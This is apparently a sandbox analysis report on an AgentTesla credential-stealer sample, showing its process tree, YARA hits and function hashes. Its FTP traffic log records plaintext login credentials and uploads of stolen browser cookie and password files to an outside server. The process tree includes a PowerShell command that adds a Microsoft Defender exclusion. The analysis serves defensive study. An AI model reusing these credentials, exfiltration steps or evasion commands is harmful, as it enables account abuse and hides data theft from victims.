Jan 11, 2025 04:21:05.049140930 CET	21	49735	192.254.225.136	192.168.2.4	227 Entering Passive Mode (192,254,225,136,152,22)
Jan 11, 2025 04:21:05.055555105 CET	49735	21	192.168.2.4	192.254.225.136	STOR CO_Chrome_Default.txt_user-830021_2025_01_10_22_51_01.txt
Jan 11, 2025 04:21:05.532484055 CET	21	49735	192.254.225.136	192.168.2.4	150 Accepted data connection
Jan 11, 2025 04:21:05.678498030 CET	21	49735	192.254.225.136	192.168.2.4	226-File successfully transferred 226-File successfully transferred226 0.146 seconds (measured here), 22.44 Kbytes per second
Jan 11, 2025 04:21:05.678908110 CET	49735	21	192.168.2.4	192.254.225.136	PASV
Jan 11, 2025 04:21:05.825026989 CET	21	49735	192.254.225.136	192.168.2.4	227 Entering Passive Mode (192,254,225,136,192,230)
Jan 11, 2025 04:21:05.833170891 CET	49735	21	192.168.2.4	192.254.225.136	STOR CO_Firefox_fqs92o4p.default-release.txt_user-830021_2025_01_11_02_00_30.txt
Jan 11, 2025 04:21:06.298521042 CET	21	49735	192.254.225.136	192.168.2.4	150 Accepted data connection
Jan 11, 2025 04:21:06.444796085 CET	21	49735	192.254.225.136	192.168.2.4	226 File successfully transferred
Jan 11, 2025 04:21:15.081118107 CET	21	49741	192.254.225.136	192.168.2.4	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 22:21. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 22:21. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 22:21. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Jan 11, 2025 04:21:15.081290007 CET	49741	21	192.168.2.4	192.254.225.136	USER ben@ercolina-usa.com
Jan 11, 2025 04:21:15.227514029 CET	21	49741	192.254.225.136	192.168.2.4	331 User ben@ercolina-usa.com OK. Password required
Jan 11, 2025 04:21:15.227643013 CET	49741	21	192.168.2.4	192.254.225.136	PASS nXe0M~WkW&nJ
Jan 11, 2025 04:21:15.485028028 CET	21	49741	192.254.225.136	192.168.2.4	230 OK. Current restricted directory is /
Jan 11, 2025 04:21:15.631519079 CET	21	49741	192.254.225.136	192.168.2.4	504 Unknown command
Jan 11, 2025 04:21:15.632368088 CET	49741	21	192.168.2.4	192.254.225.136	PWD
Jan 11, 2025 04:21:15.778208971 CET	21	49741	192.254.225.136	192.168.2.4	257 "/" is your current location
Jan 11, 2025 04:21:15.778373003 CET	49741	21	192.168.2.4	192.254.225.136	TYPE I
Jan 11, 2025 04:21:15.924542904 CET	21	49741	192.254.225.136	192.168.2.4	200 TYPE is now 8-bit binary
Jan 11, 2025 04:21:15.925431967 CET	49741	21	192.168.2.4	192.254.225.136	PASV
Jan 11, 2025 04:21:16.071548939 CET	21	49741	192.254.225.136	192.168.2.4	227 Entering Passive Mode (192,254,225,136,165,9)
Jan 11, 2025 04:21:16.078440905 CET	49741	21	192.168.2.4	192.254.225.136	STOR PW_user-830021_2025_01_10_22_21_13.html
Jan 11, 2025 04:21:16.551496029 CET	21	49741	192.254.225.136	192.168.2.4	150 Accepted data connection
Jan 11, 2025 04:21:16.699701071 CET	21	49741	192.254.225.136	192.168.2.4	226-File successfully transferred 226-File successfully transferred226 0.148 seconds (measured here), 2.29 Kbytes per second
Jan 11, 2025 04:21:16.721009970 CET	49741	21	192.168.2.4	192.254.225.136	PASV
Jan 11, 2025 04:21:16.867297888 CET	21	49741	192.254.225.136	192.168.2.4	227 Entering Passive Mode (192,254,225,136,192,174)
Jan 11, 2025 04:21:16.872740984 CET	49741	21	192.168.2.4	192.254.225.136	STOR CO_Chrome_Default.txt_user-830021_2025_01_11_01_20_56.txt
Jan 11, 2025 04:21:17.344033957 CET	21	49741	192.254.225.136	192.168.2.4	150 Accepted data connection
Jan 11, 2025 04:21:17.491111040 CET	21	49741	192.254.225.136	192.168.2.4	226-File successfully transferred 226-File successfully transferred226 0.148 seconds (measured here), 22.16 Kbytes per second
Jan 11, 2025 04:21:17.491470098 CET	49741	21	192.168.2.4	192.254.225.136	PASV
Jan 11, 2025 04:21:17.637845039 CET	21	49741	192.254.225.136	192.168.2.4	227 Entering Passive Mode (192,254,225,136,140,225)
Jan 11, 2025 04:21:17.643291950 CET	49741	21	192.168.2.4	192.254.225.136	STOR CO_Firefox_fqs92o4p.default-release.txt_user-830021_2025_01_11_02_20_41.txt
Jan 11, 2025 04:21:18.114681959 CET	21	49741	192.254.225.136	192.168.2.4	150 Accepted data connection
Jan 11, 2025 04:21:18.262296915 CET	21	49741	192.254.225.136	192.168.2.4	226 File successfully transferred
Jan 11, 2025 04:21:22.861179113 CET	21	49752	192.254.225.136	192.168.2.4	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 22:21. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 22:21. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 22:21. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Jan 11, 2025 04:21:22.861378908 CET	49752	21	192.168.2.4	192.254.225.136	USER ben@ercolina-usa.com
Jan 11, 2025 04:21:23.009325027 CET	21	49752	192.254.225.136	192.168.2.4	331 User ben@ercolina-usa.com OK. Password required
Jan 11, 2025 04:21:23.009464979 CET	49752	21	192.168.2.4	192.254.225.136	PASS nXe0M~WkW&nJ
Jan 11, 2025 04:21:23.256390095 CET	21	49752	192.254.225.136	192.168.2.4	230 OK. Current restricted directory is /
Jan 11, 2025 04:21:23.402278900 CET	21	49752	192.254.225.136	192.168.2.4	504 Unknown command
Jan 11, 2025 04:21:23.402451992 CET	49752	21	192.168.2.4	192.254.225.136	PWD
Jan 11, 2025 04:21:23.548365116 CET	21	49752	192.254.225.136	192.168.2.4	257 "/" is your current location
Jan 11, 2025 04:21:23.548624992 CET	49752	21	192.168.2.4	192.254.225.136	TYPE I
Jan 11, 2025 04:21:23.695213079 CET	21	49752	192.254.225.136	192.168.2.4	200 TYPE is now 8-bit binary
Jan 11, 2025 04:21:23.695348978 CET	49752	21	192.168.2.4	192.254.225.136	PASV
Jan 11, 2025 04:21:23.845820904 CET	21	49752	192.254.225.136	192.168.2.4	227 Entering Passive Mode (192,254,225,136,185,42)
Jan 11, 2025 04:21:23.851672888 CET	49752	21	192.168.2.4	192.254.225.136	STOR PW_user-830021_2025_01_10_22_21_21.html
Jan 11, 2025 04:21:24.331221104 CET	21	49752	192.254.225.136	192.168.2.4	150 Accepted data connection
Jan 11, 2025 04:21:24.477792025 CET	21	49752	192.254.225.136	192.168.2.4	226-File successfully transferred 226-File successfully transferred226 0.146 seconds (measured here), 2.32 Kbytes per second
Jan 11, 2025 04:21:24.500842094 CET	49752	21	192.168.2.4	192.254.225.136	PASV
Jan 11, 2025 04:21:24.647654057 CET	21	49752	192.254.225.136	192.168.2.4	227 Entering Passive Mode (192,254,225,136,186,243)
Jan 11, 2025 04:21:24.653223991 CET	49752	21	192.168.2.4	192.254.225.136	STOR CO_Chrome_Default.txt_user-830021_2025_01_11_01_31_02.txt
Jan 11, 2025 04:21:25.132091999 CET	21	49752	192.254.225.136	192.168.2.4	150 Accepted data connection
Jan 11, 2025 04:21:25.278572083 CET	21	49752	192.254.225.136	192.168.2.4	226-File successfully transferred 226-File successfully transferred226 0.146 seconds (measured here), 22.42 Kbytes per second
Jan 11, 2025 04:21:25.278881073 CET	49752	21	192.168.2.4	192.254.225.136	PASV
Jan 11, 2025 04:21:25.424976110 CET	21	49752	192.254.225.136	192.168.2.4	227 Entering Passive Mode (192,254,225,136,151,18)
Jan 11, 2025 04:21:25.430588961 CET	49752	21	192.168.2.4	192.254.225.136	STOR CO_Firefox_fqs92o4p.default-release.txt_user-830021_2025_01_11_02_40_44.txt
Jan 11, 2025 04:21:25.891190052 CET	21	49752	192.254.225.136	192.168.2.4	150 Accepted data connection
Jan 11, 2025 04:21:26.040491104 CET	21	49752	192.254.225.136	192.168.2.4	226 File successfully transferred
Jan 11, 2025 04:23:07.949067116 CET	21	50022	192.254.225.136	192.168.2.4	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 22:23. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 22:23. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 22:23. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Jan 11, 2025 04:23:07.952410936 CET	50022	21	192.168.2.4	192.254.225.136	USER ben@ercolina-usa.com
Jan 11, 2025 04:23:08.102293015 CET	21	50022	192.254.225.136	192.168.2.4	331 User ben@ercolina-usa.com OK. Password required
Jan 11, 2025 04:23:08.104441881 CET	50022	21	192.168.2.4	192.254.225.136	PASS nXe0M~WkW&nJ
Jan 11, 2025 04:23:08.357089043 CET	21	50022	192.254.225.136	192.168.2.4	230 OK. Current restricted directory is /
Jan 11, 2025 04:23:08.507328987 CET	21	50022	192.254.225.136	192.168.2.4	504 Unknown command
Jan 11, 2025 04:23:08.507504940 CET	50022	21	192.168.2.4	192.254.225.136	PWD
Jan 11, 2025 04:23:08.657403946 CET	21	50022	192.254.225.136	192.168.2.4	257 "/" is your current location

Target ID:	0
Start time:	22:20:57
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\iNFGd6bDZX.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\iNFGd6bDZX.exe"
Imagebase:	0x200000
File size:	927'232 bytes
MD5 hash:	8FBFFB8434E574EA1BB6865DA7AF4C8D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1726457785.0000000004221000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1726457785.0000000004221000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	22:20:59
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iNFGd6bDZX.exe"
Imagebase:	0x260000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	22:21:00
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\iNFGd6bDZX.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\iNFGd6bDZX.exe"
Imagebase:	0x440000
File size:	927'232 bytes
MD5 hash:	8FBFFB8434E574EA1BB6865DA7AF4C8D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	22:21:00
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	22:21:00
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\iNFGd6bDZX.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\iNFGd6bDZX.exe"
Imagebase:	0xf20000
File size:	927'232 bytes
MD5 hash:	8FBFFB8434E574EA1BB6865DA7AF4C8D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2927556251.000000000340C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2927556251.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2927556251.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	22:21:01
Start date:	10/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	22:21:10
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\newapp\newapp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Imagebase:	0xdd0000
File size:	927'232 bytes
MD5 hash:	8FBFFB8434E574EA1BB6865DA7AF4C8D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1840585657.0000000004E6E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.1840585657.0000000004E6E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1840585657.0000000004EEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.1840585657.0000000004EEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 63%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	22:21:11
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\newapp\newapp.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Imagebase:	0x380000
File size:	927'232 bytes
MD5 hash:	8FBFFB8434E574EA1BB6865DA7AF4C8D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	22:21:11
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\newapp\newapp.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Imagebase:	0x220000
File size:	927'232 bytes
MD5 hash:	8FBFFB8434E574EA1BB6865DA7AF4C8D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	22:21:11
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\newapp\newapp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Imagebase:	0x6e0000
File size:	927'232 bytes
MD5 hash:	8FBFFB8434E574EA1BB6865DA7AF4C8D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2927028894.0000000002B7C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2927028894.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2927028894.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2918833865.0000000000436000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2918833865.0000000000436000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	22:21:19
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\newapp\newapp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Imagebase:	0x200000
File size:	927'232 bytes
MD5 hash:	8FBFFB8434E574EA1BB6865DA7AF4C8D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.1939852793.000000000427F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.1939852793.000000000427F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	22:21:20
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\newapp\newapp.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Imagebase:	0x360000
File size:	927'232 bytes
MD5 hash:	8FBFFB8434E574EA1BB6865DA7AF4C8D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	22:21:20
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\newapp\newapp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Imagebase:	0x720000
File size:	927'232 bytes
MD5 hash:	8FBFFB8434E574EA1BB6865DA7AF4C8D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.2925773285.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2925773285.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.2925773285.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	13.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.3%
Total number of Nodes:	132
Total number of Limit Nodes:	7

Executed Functions

Function 00C70E85 Relevance: 2.7, Strings: 2, Instructions: 171
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 00C70F35
Te^q, xrefs: 00C7107F

Memory Dump Source

Source File: 00000000.00000002.1724151416.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID: Te^q$Te^q
API String ID: 0-3743469327
Opcode ID: c8b3fa931a474005bc1be6ab21ff73a0ac2095b8979a26e4b5d70698a0f217a4
Instruction ID: 57f089751182e39db64d50c984a0835e6f01fcc683d5bba81e477e201b0c7a53
Opcode Fuzzy Hash: c8b3fa931a474005bc1be6ab21ff73a0ac2095b8979a26e4b5d70698a0f217a4
Instruction Fuzzy Hash: 7251E371B14285CFCB059FB9899466EBBF2FF85300F2584AAE519EF2A1CB708D05CB51

Function 00C70F18 Relevance: 2.6, Strings: 2, Instructions: 130
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 00C70F35
Te^q, xrefs: 00C7107F

Memory Dump Source

Source File: 00000000.00000002.1724151416.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID: Te^q$Te^q
API String ID: 0-3743469327
Opcode ID: e70d957443b50690a824e2eb7fb0caa3573d40ee52dcbf7aa2858dd528ef45f8
Instruction ID: 3e1242d8ddc63ae93c6de53cf19aa8f261f1415c3bb093f5975e21d329a78c90
Opcode Fuzzy Hash: e70d957443b50690a824e2eb7fb0caa3573d40ee52dcbf7aa2858dd528ef45f8
Instruction Fuzzy Hash: 6441C431B00155CFCB08DFAAC94466EB7F6FB88700F21846AE51AEB3A0DB319D058B91

Function 08EEF138 Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21d87069f9551d8a8df98f9a485a8e8436393bada4c6de748965df2e2662361f
Instruction ID: 61b7943fefd1e8688a1803e9742bf9b8b87df38594f20339c40b2ab6b635340b
Opcode Fuzzy Hash: 21d87069f9551d8a8df98f9a485a8e8436393bada4c6de748965df2e2662361f
Instruction Fuzzy Hash: 2E3298727016048FDB19DBA9C450BAEB7F6AF89305F2484ADE10A9B3A1CF35ED41CB51

Function 08EE1E78 Relevance: .3, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 803f04da48f1c0e5385b412cf7e045dde788db8fcc564f1c07183806faaa7e57
Instruction ID: c48c804701016b3561be7867882fbc9f572c5affef604bce987ddd949d498a4e
Opcode Fuzzy Hash: 803f04da48f1c0e5385b412cf7e045dde788db8fcc564f1c07183806faaa7e57
Instruction Fuzzy Hash: 1CB15832A082458FD705DF69C8406FABB76AF43312F4891ABF655DF192C7358889C7A2

Function 08EED3E0 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5176c90536e90a6445aa687b729f3a6ffe21b623645e364e1bef11f549d2849
Instruction ID: 4b51e7507be063d9aeedde2eba0ec82c3180ecf050477897cef0b4daa909569e
Opcode Fuzzy Hash: c5176c90536e90a6445aa687b729f3a6ffe21b623645e364e1bef11f549d2849
Instruction Fuzzy Hash: EE712871E45229CBDB64CF6ACC407E9B7B6BF99301F10D1EAE40DA6244EB745A85CF40

Function 08EED88D Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e64de232f694be3a4b8ab421e64bece87e2aa0a47573c362bf186da84577794a
Instruction ID: ad279afc356fc1bfa4da4bf400a6acdfb3cfdcf07946723a696943b58bd47710
Opcode Fuzzy Hash: e64de232f694be3a4b8ab421e64bece87e2aa0a47573c362bf186da84577794a
Instruction Fuzzy Hash: EEA00207EEF804C480009C9859405F4E03C470F167F107C00B81F372060400C004400C

Function 08EEB764 Relevance: 1.7, APIs: 1, Instructions: 249
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 08EEB9A6

Memory Dump Source

Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d78feba67bf20bcab41f50d59763aa08e8f85fce2e34e4742d7d21b9a60b2974
Instruction ID: 56b635de0269c95eb017fa925e32322b984e77547846bd5c4c2d1e31d21391de
Opcode Fuzzy Hash: d78feba67bf20bcab41f50d59763aa08e8f85fce2e34e4742d7d21b9a60b2974
Instruction Fuzzy Hash: C9A15B72D00219DFDF20CFA8C8417EDBBB2AF88315F1481A9E859B7250DB749985CF92

Function 08EEB770 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 08EEB9A6

Memory Dump Source

Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e05bab92b8d255c37653f7cba052a9acc351236df869ba279e2d810d18186c5b
Instruction ID: d3ace68221e886630a479a2e97c660c7b7789cd817f861e5c105d7e847b082e7
Opcode Fuzzy Hash: e05bab92b8d255c37653f7cba052a9acc351236df869ba279e2d810d18186c5b
Instruction Fuzzy Hash: 8B913A72D00619DFDF24CFA8C8417EDBBB2AF88315F1481A9E858B7250DB749985CF92

Function 00C78FCC Relevance: 1.6, APIs: 1, Instructions: 104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00C79089

Memory Dump Source

Source File: 00000000.00000002.1724151416.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_iNFGd6bDZX.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b46d22fb6bce13b38d63d2e021c601f706e41778d70f001eedb87fa14cc719fc
Instruction ID: 229dfb7f1c828e0c8652bee0e856f5bf785ff1032e160d5d8173232327971399
Opcode Fuzzy Hash: b46d22fb6bce13b38d63d2e021c601f706e41778d70f001eedb87fa14cc719fc
Instruction Fuzzy Hash: 4D41EFB0C00619DFDB24DFA9C844BDEBBB6BF48304F24806AE418AB255DB756945CF91

Function 00C77B5C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00C79089

Memory Dump Source

Source File: 00000000.00000002.1724151416.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_iNFGd6bDZX.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 723cf241921c63287b8628b99eab5cb4ab90a99ed1cb1d8abddfcaea13c5ee52
Instruction ID: c39b67d1da369a9abe596abc88358cff120e8ab3626cb9946614f3e010768154
Opcode Fuzzy Hash: 723cf241921c63287b8628b99eab5cb4ab90a99ed1cb1d8abddfcaea13c5ee52
Instruction Fuzzy Hash: 0641C0B0C00719DFDB24DFAAC844B9EBBB6FF48304F24806AD419AB255DB756945CF90

Function 08EEB4E0 Relevance: 1.6, APIs: 1, Instructions: 73
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 08EEB578

Memory Dump Source

Source File: 00000000.00000002.1730344004.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ee0000_iNFGd6bDZX.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
